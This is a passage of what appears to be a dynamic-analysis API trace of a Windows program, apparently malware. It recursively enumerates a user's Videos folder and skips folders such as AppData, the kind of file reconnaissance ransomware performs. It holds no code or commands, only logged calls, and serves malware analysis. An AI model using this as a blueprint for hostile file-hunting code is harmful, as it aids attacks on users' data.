lpFindFileData=0x61de90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3806420, ftCreationTime.dwHighDateTime=0x1d5d9e8, ftLastAccessTime.dwLowDateTime=0x875e0470, ftLastAccessTime.dwHighDateTime=0x1d5da67, ftLastWriteTime.dwLowDateTime=0x875e0470, ftLastWriteTime.dwHighDateTime=0x1d5da67, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0074.625] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de90 | out: lpFindFileData=0x61de90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f5e8260, ftCreationTime.dwHighDateTime=0x1d5dd9d, ftLastAccessTime.dwLowDateTime=0x7011bde0, ftLastAccessTime.dwHighDateTime=0x1d5e2d5, ftLastWriteTime.dwLowDateTime=0x7011bde0, ftLastWriteTime.dwHighDateTime=0x1d5e2d5, nFileSizeHigh=0x0, nFileSizeLow=0xf4b5, dwReserved0=0x4, dwReserved1=0x657690, cFileName="4Us08VSplrH Ofh79JeB.mkv", cAlternateFileName="4US08V~1.MKV")) returned 1 [0074.626] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de78 | out: lpFindFileData=0x61de78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fb86e90, ftCreationTime.dwHighDateTime=0x1d5e79c, ftLastAccessTime.dwLowDateTime=0x9c8857a0, ftLastAccessTime.dwHighDateTime=0x1d5dfea, ftLastWriteTime.dwLowDateTime=0x9c8857a0, ftLastWriteTime.dwHighDateTime=0x1d5dfea, nFileSizeHigh=0x0, nFileSizeLow=0x22da, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="6rBGDlSa.avi", cAlternateFileName="")) returned 1 [0074.626] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de78 | out: lpFindFileData=0x61de78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dae39b0, ftCreationTime.dwHighDateTime=0x1d5dc44, ftLastAccessTime.dwLowDateTime=0x50adf490, ftLastAccessTime.dwHighDateTime=0x1d5e44d, ftLastWriteTime.dwLowDateTime=0x50adf490, ftLastWriteTime.dwHighDateTime=0x1d5e44d, nFileSizeHigh=0x0, nFileSizeLow=0xab9c, dwReserved0=0x10, dwReserved1=0x657690, cFileName="g9kkkj.mp4", cAlternateFileName="")) returned 1 [0074.626] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de78 | out: lpFindFileData=0x61de78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50390e50, ftCreationTime.dwHighDateTime=0x1d5e42f, ftLastAccessTime.dwLowDateTime=0xd54794f0, ftLastAccessTime.dwHighDateTime=0x1d5deb6, ftLastWriteTime.dwLowDateTime=0xd54794f0, ftLastWriteTime.dwHighDateTime=0x1d5deb6, nFileSizeHigh=0x0, nFileSizeLow=0x5016, dwReserved0=0x10, dwReserved1=0x657690, cFileName="RIN_E.avi", cAlternateFileName="")) returned 1 [0074.627] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de78 | out: lpFindFileData=0x61de78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e1d08a0, ftCreationTime.dwHighDateTime=0x1d5e2cf, ftLastAccessTime.dwLowDateTime=0x7b3a1a70, ftLastAccessTime.dwHighDateTime=0x1d5da72, ftLastWriteTime.dwLowDateTime=0x7b3a1a70, ftLastWriteTime.dwHighDateTime=0x1d5da72, nFileSizeHigh=0x0, nFileSizeLow=0x4953, dwReserved0=0x10, dwReserved1=0x657690, cFileName="_4X_CNShky.mkv", cAlternateFileName="_4X_CN~1.MKV")) returned 1 [0074.627] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de78 | out: lpFindFileData=0x61de78*(dwFileAttributes=0x1440055, ftCreationTime.dwLowDateTime=0xc3b34, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0x17, ftLastWriteTime.dwHighDateTime=0x1400056, nFileSizeHigh=0xc3b34, nFileSizeLow=0x6bbff0, dwReserved0=0x10, dwReserved1=0x657690, cFileName="_4\x08", cAlternateFileName="haဓ\x03\x10")) returned 0 [0074.627] FindClose (in: hFindFile=0x6b8bb8 | out: hFindFile=0x6b8bb8) returned 1 [0074.627] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb14b600, ftCreationTime.dwHighDateTime=0x1d5e70c, ftLastAccessTime.dwLowDateTime=0xae6eb000, ftLastAccessTime.dwHighDateTime=0x1d5dad0, ftLastWriteTime.dwLowDateTime=0xae6eb000, ftLastWriteTime.dwHighDateTime=0x1d5dad0, nFileSizeHigh=0x0, nFileSizeLow=0x102c9, dwReserved0=0x657494, dwReserved1=0x657690, cFileName="c5JuP_Nf8XPMTRuN_.avi", cAlternateFileName="C5JUP_~1.AVI")) returned 1 [0074.627] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d049f0, ftCreationTime.dwHighDateTime=0x1d5db11, ftLastAccessTime.dwLowDateTime=0x9a14a90, ftLastAccessTime.dwHighDateTime=0x1d5da28, ftLastWriteTime.dwLowDateTime=0x9a14a90, ftLastWriteTime.dwHighDateTime=0x1d5da28, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="e1Y-mgGtzCZzg", cAlternateFileName="E1Y-MG~1")) returned 1 [0074.627] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.627] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\*", lpFindFileData=0x61de90 | out: lpFindFileData=0x61de90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d049f0, ftCreationTime.dwHighDateTime=0x1d5db11, ftLastAccessTime.dwLowDateTime=0x9a14a90, ftLastAccessTime.dwHighDateTime=0x1d5da28, ftLastWriteTime.dwLowDateTime=0x9a14a90, ftLastWriteTime.dwHighDateTime=0x1d5da28, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8bb8 [0074.627] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de90 | out: lpFindFileData=0x61de90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d049f0, ftCreationTime.dwHighDateTime=0x1d5db11, ftLastAccessTime.dwLowDateTime=0x9a14a90, ftLastAccessTime.dwHighDateTime=0x1d5da28, ftLastWriteTime.dwLowDateTime=0x9a14a90, ftLastWriteTime.dwHighDateTime=0x1d5da28, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0074.627] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de90 | out: lpFindFileData=0x61de90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7a5ae0, ftCreationTime.dwHighDateTime=0x1d5e65e, ftLastAccessTime.dwLowDateTime=0x1d6f670, ftLastAccessTime.dwHighDateTime=0x1d5dfb4, ftLastWriteTime.dwLowDateTime=0x1d6f670, ftLastWriteTime.dwHighDateTime=0x1d5dfb4, nFileSizeHigh=0x0, nFileSizeLow=0xb964, dwReserved0=0x4, dwReserved1=0x657690, cFileName="0vlShOAoYV07RlGs7cfh.flv", cAlternateFileName="0VLSHO~1.FLV")) returned 1 [0074.627] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de78 | out: lpFindFileData=0x61de78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7058bcd0, ftCreationTime.dwHighDateTime=0x1d5e3e4, ftLastAccessTime.dwLowDateTime=0xd897bd50, ftLastAccessTime.dwHighDateTime=0x1d5db74, ftLastWriteTime.dwLowDateTime=0xd897bd50, ftLastWriteTime.dwHighDateTime=0x1d5db74, nFileSizeHigh=0x0, nFileSizeLow=0xe1da, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="9e BCelV9odP5IiT.avi", cAlternateFileName="9EBCEL~1.AVI")) returned 1 [0074.627] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de78 | out: lpFindFileData=0x61de78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf297f770, ftCreationTime.dwHighDateTime=0x1d5e569, ftLastAccessTime.dwLowDateTime=0x9fa1c510, ftLastAccessTime.dwHighDateTime=0x1d5e239, ftLastWriteTime.dwLowDateTime=0x9fa1c510, ftLastWriteTime.dwHighDateTime=0x1d5e239, nFileSizeHigh=0x0, nFileSizeLow=0x7678, dwReserved0=0x10, dwReserved1=0x657690, cFileName="jyvwvjYdk6QKt4.mkv", cAlternateFileName="JYVWVJ~1.MKV")) returned 1 [0074.627] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de78 | out: lpFindFileData=0x61de78*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc62efd0, ftCreationTime.dwHighDateTime=0x1d5e753, ftLastAccessTime.dwLowDateTime=0x9b944070, ftLastAccessTime.dwHighDateTime=0x1d5df36, ftLastWriteTime.dwLowDateTime=0x9b944070, ftLastWriteTime.dwHighDateTime=0x1d5df36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x657690, cFileName="Op Gi7LiHe dQIhO", cAlternateFileName="OPGI7L~1")) returned 1 [0074.628] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.628] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\*", lpFindFileData=0x61dc38 | out: lpFindFileData=0x61dc38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc62efd0, ftCreationTime.dwHighDateTime=0x1d5e753, ftLastAccessTime.dwLowDateTime=0x9b944070, ftLastAccessTime.dwHighDateTime=0x1d5df36, ftLastWriteTime.dwLowDateTime=0x9b944070, ftLastWriteTime.dwHighDateTime=0x1d5df36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8c78 [0074.628] FindNextFileW (in: hFindFile=0x6b8c78, lpFindFileData=0x61dc38 | out: lpFindFileData=0x61dc38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc62efd0, ftCreationTime.dwHighDateTime=0x1d5e753, ftLastAccessTime.dwLowDateTime=0x9b944070, ftLastAccessTime.dwHighDateTime=0x1d5df36, ftLastWriteTime.dwLowDateTime=0x9b944070, ftLastWriteTime.dwHighDateTime=0x1d5df36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0074.628] FindNextFileW (in: hFindFile=0x6b8c78, lpFindFileData=0x61dc38 | out: lpFindFileData=0x61dc38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf740040, ftCreationTime.dwHighDateTime=0x1d5e0c4, ftLastAccessTime.dwLowDateTime=0x6074a350, ftLastAccessTime.dwHighDateTime=0x1d5e0ca, ftLastWriteTime.dwLowDateTime=0x6074a350, ftLastWriteTime.dwHighDateTime=0x1d5e0ca, nFileSizeHigh=0x0, nFileSizeLow=0x1443f, dwReserved0=0x4, dwReserved1=0x657690, cFileName="93QZ.swf", cAlternateFileName="")) returned 1 [0074.628] FindNextFileW (in: hFindFile=0x6b8c78, lpFindFileData=0x61dc20 | out: lpFindFileData=0x61dc20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87100690, ftCreationTime.dwHighDateTime=0x1d5debc, ftLastAccessTime.dwLowDateTime=0xd04bf290, ftLastAccessTime.dwHighDateTime=0x1d5df9f, ftLastWriteTime.dwLowDateTime=0xd04bf290, ftLastWriteTime.dwHighDateTime=0x1d5df9f, nFileSizeHigh=0x0, nFileSizeLow=0xab3a, dwReserved0=0x10, dwReserved1=0x657690, cFileName="SuitfltgQdh7fZsjOO.avi", cAlternateFileName="SUITFL~1.AVI")) returned 1 [0074.628] FindNextFileW (in: hFindFile=0x6b8c78, lpFindFileData=0x61dc20 | out: lpFindFileData=0x61dc20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x488a35b0, ftCreationTime.dwHighDateTime=0x1d5e67f, ftLastAccessTime.dwLowDateTime=0xa475b570, ftLastAccessTime.dwHighDateTime=0x1d5e0f3, ftLastWriteTime.dwLowDateTime=0xa475b570, ftLastWriteTime.dwHighDateTime=0x1d5e0f3, nFileSizeHigh=0x0, nFileSizeLow=0x139cc, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="vgCMnA4csdU WVhA.avi", cAlternateFileName="VGCMNA~1.AVI")) returned 1 [0074.628] FindNextFileW (in: hFindFile=0x6b8c78, lpFindFileData=0x61dc20 | out: lpFindFileData=0x61dc20*(dwFileAttributes=0x1600044, ftCreationTime.dwLowDateTime=0xc3bd5, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0x1d, ftLastWriteTime.dwHighDateTime=0x1680045, nFileSizeHigh=0xc3bd5, nFileSizeLow=0x6bbff0, dwReserved0=0x10, dwReserved1=0x657690, cFileName="vg\x08", cAlternateFileName="h?aဓ\x03\x10")) returned 0 [0074.628] FindClose (in: hFindFile=0x6b8c78 | out: hFindFile=0x6b8c78) returned 1 [0074.628] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de78 | out: lpFindFileData=0x61de78*(dwFileAttributes=0x14e0055, ftCreationTime.dwLowDateTime=0xc3bed, ftCreationTime.dwHighDateTime=0x657690, ftLastAccessTime.dwLowDateTime=0xc3bd8, ftLastAccessTime.dwHighDateTime=0x8, ftLastWriteTime.dwLowDateTime=0xd6310, ftLastWriteTime.dwHighDateTime=0x1360056, nFileSizeHigh=0xc3bed, nFileSizeLow=0x657380, dwReserved0=0x657494, dwReserved1=0x657690, cFileName="眐e\x08", cAlternateFileName="haဓ\x03\x10")) returned 0 [0074.628] FindClose (in: hFindFile=0x6b8bb8 | out: hFindFile=0x6b8bb8) returned 1 [0074.628] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7ff05d0, ftCreationTime.dwHighDateTime=0x1d5e6a3, ftLastAccessTime.dwLowDateTime=0x5a7a7540, ftLastAccessTime.dwHighDateTime=0x1d5dd98, ftLastWriteTime.dwLowDateTime=0x5a7a7540, ftLastWriteTime.dwHighDateTime=0x1d5dd98, nFileSizeHigh=0x0, nFileSizeLow=0x180a6, dwReserved0=0x657494, dwReserved1=0x657690, cFileName="NsEh3.swf", cAlternateFileName="")) returned 1 [0074.629] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x1180066, ftCreationTime.dwLowDateTime=0xc3c12, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0x13, ftLastWriteTime.dwHighDateTime=0x1320067, nFileSizeHigh=0xc3c12, nFileSizeLow=0x6b9ac8, dwReserved0=0x10, dwReserved1=0x657690, cFileName="Ns\x08", cAlternateFileName="haဓ\x03\x10")) returned 0 [0074.629] FindClose (in: hFindFile=0x6b8af8 | out: hFindFile=0x6b8af8) returned 1 [0074.629] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x337b2040, ftCreationTime.dwHighDateTime=0x1d5e23c, ftLastAccessTime.dwLowDateTime=0xa66b2270, ftLastAccessTime.dwHighDateTime=0x1d5db85, ftLastWriteTime.dwLowDateTime=0xa66b2270, ftLastWriteTime.dwHighDateTime=0x1d5db85, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x657494, dwReserved1=0x657690, cFileName="GHIoo2t", cAlternateFileName="")) returned 1 [0074.629] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0074.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GHIoo2t", cchCount1=7, lpString2="AppData", cchCount2=7) returned 3 [0074.641] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.641] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\*", lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x337b2040, ftCreationTime.dwHighDateTime=0x1d5e23c, ftLastAccessTime.dwLowDateTime=0xa66b2270, ftLastAccessTime.dwHighDateTime=0x1d5db85, ftLastWriteTime.dwLowDateTime=0xa66b2270, ftLastWriteTime.dwHighDateTime=0x1d5db85, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8af8 [0074.641] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x337b2040, ftCreationTime.dwHighDateTime=0x1d5e23c, ftLastAccessTime.dwLowDateTime=0xa66b2270, ftLastAccessTime.dwHighDateTime=0x1d5db85, ftLastWriteTime.dwLowDateTime=0xa66b2270, ftLastWriteTime.dwHighDateTime=0x1d5db85, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0074.641] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0f4c60, ftCreationTime.dwHighDateTime=0x1d5e3e5, ftLastAccessTime.dwLowDateTime=0x632e5550, ftLastAccessTime.dwHighDateTime=0x1d5e6ce, ftLastWriteTime.dwLowDateTime=0x632e5550, ftLastWriteTime.dwHighDateTime=0x1d5e6ce, nFileSizeHigh=0x0, nFileSizeLow=0x12628, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="d8qDzfY_.swf", cAlternateFileName="")) returned 1 [0074.641] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x210cc660, ftCreationTime.dwHighDateTime=0x1d5d964, ftLastAccessTime.dwLowDateTime=0x7df0cc0, ftLastAccessTime.dwHighDateTime=0x1d5de3c, ftLastWriteTime.dwLowDateTime=0x7df0cc0, ftLastWriteTime.dwHighDateTime=0x1d5de3c, nFileSizeHigh=0x0, nFileSizeLow=0x8c35, dwReserved0=0x10, dwReserved1=0x657690, cFileName="Mmrkxsc9iiZ.swf", cAlternateFileName="MMRKXS~1.SWF")) returned 1 [0074.641] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe109e7d0, ftCreationTime.dwHighDateTime=0x1d5e45a, ftLastAccessTime.dwLowDateTime=0xbdc7e7c0, ftLastAccessTime.dwHighDateTime=0x1d5e191, ftLastWriteTime.dwLowDateTime=0xbdc7e7c0, ftLastWriteTime.dwHighDateTime=0x1d5e191, nFileSizeHigh=0x0, nFileSizeLow=0x11e7e, dwReserved0=0x10, dwReserved1=0x657690, cFileName="tv3AVY6IGn_a.swf", cAlternateFileName="TV3AVY~1.SWF")) returned 1 [0074.641] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2966e470, ftCreationTime.dwHighDateTime=0x1d5e12b, ftLastAccessTime.dwLowDateTime=0x1a312ae0, ftLastAccessTime.dwHighDateTime=0x1d5e489, ftLastWriteTime.dwLowDateTime=0x1a312ae0, ftLastWriteTime.dwHighDateTime=0x1d5e489, nFileSizeHigh=0x0, nFileSizeLow=0x2f3c, dwReserved0=0x10, dwReserved1=0x657690, cFileName="zEgvJih7.mp4", cAlternateFileName="")) returned 1 [0074.641] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x1180066, ftCreationTime.dwLowDateTime=0xc3c82, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0x11, ftLastWriteTime.dwHighDateTime=0x1200067, nFileSizeHigh=0xc3c82, nFileSizeLow=0x6b9ac8, dwReserved0=0x10, dwReserved1=0x657690, cFileName="zE\x08", cAlternateFileName="haဓ\x03\x10")) returned 0 [0074.641] FindClose (in: hFindFile=0x6b8af8 | out: hFindFile=0x6b8af8) returned 1 [0074.642] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14e7e620, ftCreationTime.dwHighDateTime=0x1d5dfbe, ftLastAccessTime.dwLowDateTime=0xaf27bc50, ftLastAccessTime.dwHighDateTime=0x1d5deed, ftLastWriteTime.dwLowDateTime=0xaf27bc50, ftLastWriteTime.dwHighDateTime=0x1d5deed, nFileSizeHigh=0x0, nFileSizeLow=0x425e, dwReserved0=0x657494, dwReserved1=0x657690, cFileName="z4iUj36y_uRj.flv", cAlternateFileName="Z4IUJ3~1.FLV")) returned 1 [0074.642] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb6993f90, ftCreationTime.dwHighDateTime=0x1d5d844, ftLastAccessTime.dwLowDateTime=0x28926d40, ftLastAccessTime.dwHighDateTime=0x1d5e427, ftLastWriteTime.dwLowDateTime=0x28926d40, ftLastWriteTime.dwHighDateTime=0x1d5e427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x657690, cFileName="z58zBpaZzgTTH", cAlternateFileName="Z58ZBP~1")) returned 1 [0074.642] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0074.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z58zBpaZzgTTH", cchCount1=13, lpString2="AppData", cchCount2=7) returned 3 [0074.642] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.642] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\*", lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb6993f90, ftCreationTime.dwHighDateTime=0x1d5d844, ftLastAccessTime.dwLowDateTime=0x28926d40, ftLastAccessTime.dwHighDateTime=0x1d5e427, ftLastWriteTime.dwLowDateTime=0x28926d40, ftLastWriteTime.dwHighDateTime=0x1d5e427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8af8 [0074.642] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb6993f90, ftCreationTime.dwHighDateTime=0x1d5d844, ftLastAccessTime.dwLowDateTime=0x28926d40, ftLastAccessTime.dwHighDateTime=0x1d5e427, ftLastWriteTime.dwLowDateTime=0x28926d40, ftLastWriteTime.dwHighDateTime=0x1d5e427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0074.642] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9682a920, ftCreationTime.dwHighDateTime=0x1d5d7dc, ftLastAccessTime.dwLowDateTime=0x6c1ae300, ftLastAccessTime.dwHighDateTime=0x1d5e50b, ftLastWriteTime.dwLowDateTime=0x6c1ae300, ftLastWriteTime.dwHighDateTime=0x1d5e50b, nFileSizeHigh=0x0, nFileSizeLow=0x1811c, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="448L4fbhgcrO5YwRMWv_.avi", cAlternateFileName="448L4F~1.AVI")) returned 1 [0074.642] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8829ec70, ftCreationTime.dwHighDateTime=0x1d5e4da, ftLastAccessTime.dwLowDateTime=0x72a0d840, ftLastAccessTime.dwHighDateTime=0x1d5da45, ftLastWriteTime.dwLowDateTime=0x72a0d840, ftLastWriteTime.dwHighDateTime=0x1d5da45, nFileSizeHigh=0x0, nFileSizeLow=0xf9ea, dwReserved0=0x10, dwReserved1=0x657690, cFileName="5sGE4.mkv", cAlternateFileName="")) returned 1 [0074.642] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac58d210, ftCreationTime.dwHighDateTime=0x1d5e254, ftLastAccessTime.dwLowDateTime=0x1642dec0, ftLastAccessTime.dwHighDateTime=0x1d5e11d, ftLastWriteTime.dwLowDateTime=0x1642dec0, ftLastWriteTime.dwHighDateTime=0x1d5e11d, nFileSizeHigh=0x0, nFileSizeLow=0x174c0, dwReserved0=0x10, dwReserved1=0x657690, cFileName="AcJ9.swf", cAlternateFileName="")) returned 1 [0074.642] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9978e910, ftCreationTime.dwHighDateTime=0x1d5e17c, ftLastAccessTime.dwLowDateTime=0x7fde61e0, ftLastAccessTime.dwHighDateTime=0x1d5df17, ftLastWriteTime.dwLowDateTime=0x7fde61e0, ftLastWriteTime.dwHighDateTime=0x1d5df17, nFileSizeHigh=0x0, nFileSizeLow=0x17682, dwReserved0=0x10, dwReserved1=0x657690, cFileName="AGaY9D6lmIb.mkv", cAlternateFileName="AGAY9D~1.MKV")) returned 1 [0074.642] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20431190, ftCreationTime.dwHighDateTime=0x1d5e066, ftLastAccessTime.dwLowDateTime=0x98709d60, ftLastAccessTime.dwHighDateTime=0x1d5dac4, ftLastWriteTime.dwLowDateTime=0x98709d60, ftLastWriteTime.dwHighDateTime=0x1d5dac4, nFileSizeHigh=0x0, nFileSizeLow=0xa550, dwReserved0=0x10, dwReserved1=0x657690, cFileName="c2l5D8zFcQaFr.mp4", cAlternateFileName="C2L5D8~1.MP4")) returned 1 [0074.642] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70a38ea0, ftCreationTime.dwHighDateTime=0x1d5e37a, ftLastAccessTime.dwLowDateTime=0x39e54bc0, ftLastAccessTime.dwHighDateTime=0x1d5deab, ftLastWriteTime.dwLowDateTime=0x39e54bc0, ftLastWriteTime.dwHighDateTime=0x1d5deab, nFileSizeHigh=0x0, nFileSizeLow=0x28d3, dwReserved0=0x10, dwReserved1=0x657690, cFileName="gUuRkOGgEOvL1Ts9uT.mp4", cAlternateFileName="GUURKO~1.MP4")) returned 1 [0074.643] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf92ed7c0, ftCreationTime.dwHighDateTime=0x1d5de34, ftLastAccessTime.dwLowDateTime=0xb5fc0d50, 